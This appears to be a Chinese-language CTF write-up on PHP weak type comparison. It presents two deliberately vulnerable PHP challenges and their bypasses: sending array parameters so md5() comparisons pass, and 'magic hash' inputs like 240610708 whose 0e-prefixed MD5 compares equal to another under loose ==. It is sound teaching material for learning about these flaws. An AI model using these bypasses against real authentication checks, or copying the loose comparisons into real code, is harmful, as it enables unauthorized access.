关于php弱类型比较的总结(一)
源码1:
<?php
error_reporting(0);
$flag = 'flag{test}';
if (isset($_GET['username']) and isset($_GET['password'])) {
if ($_GET['username'] == $_GET['password'])
print 'Your password can not be your username.';
else if (md5($_GET['username']) === md5($_GET['password']))
die('Flag: '.$flag);
else
print 'Invalid password';
}
?>
此处的问题在于
if ($_GET['username'] == $_GET['password'])
这里没有使用===,导致username和password可以被当做数组传值,从而绕过md5函数。
附上我的检测代码:
<?php
error_reporting(0);
if (isset($_GET['username']) and isset($_GET['password'])) {
if ($_GET['username'] == $_GET['password']){
print 'Your password can not be your username.';
}
else if (md5($_GET['username']) === md5($_GET['password'])){
echo ( 'username:'. $_GET['username']);
echo ( ' password:' . $_GET['password']);
echo ( ' md5(username):'. md5($_GET['username'] ) );
echo ( ' md5(password):' . md5($_GET['password'] ) );
}
else
print 'Invalid password';
}
?>
当我这样访问时:http://localhost:3000/1.php?username[]=1&password[]=2
得到结果:
可以看到,这里username和password都被当做数组处理了,所以成功的绕过了MD5函数的检测
源码2:
<?php
$md51 = md5('QNKCDZO');
$a = @$_GET['a'];
$md52 = @md5($a);
if(isset($a)){
if ($a != 'QNKCDZO' && $md51 == $md52) {
echo "flag{*}";
} else {
echo "false!!!";
}}
else{echo "please input a";}
?>
此处的问题在于
if ($a != 'QNKCDZO' && $md51 == $md52)
由于php对数据的处理问题,当它读到0exxx的时候会当做科学计数法来处理。无论0e后面是什么,0的多少次方还是0.
所以这里我们构造两个MD5值为0e开头的参数即可。
md5(QNKCDZO)=0e830400451993494058024219903391
md5(240610708)=0e462097431906509019562988736854
所以当我们访问http://localhost:3000/13.php?a=240610708
即可成功越过该比较。(注意这里0e后面的字符必须为数字,相关字符串可在https://www.cnblogs.com/Primzahl/p/6018158.html中查看)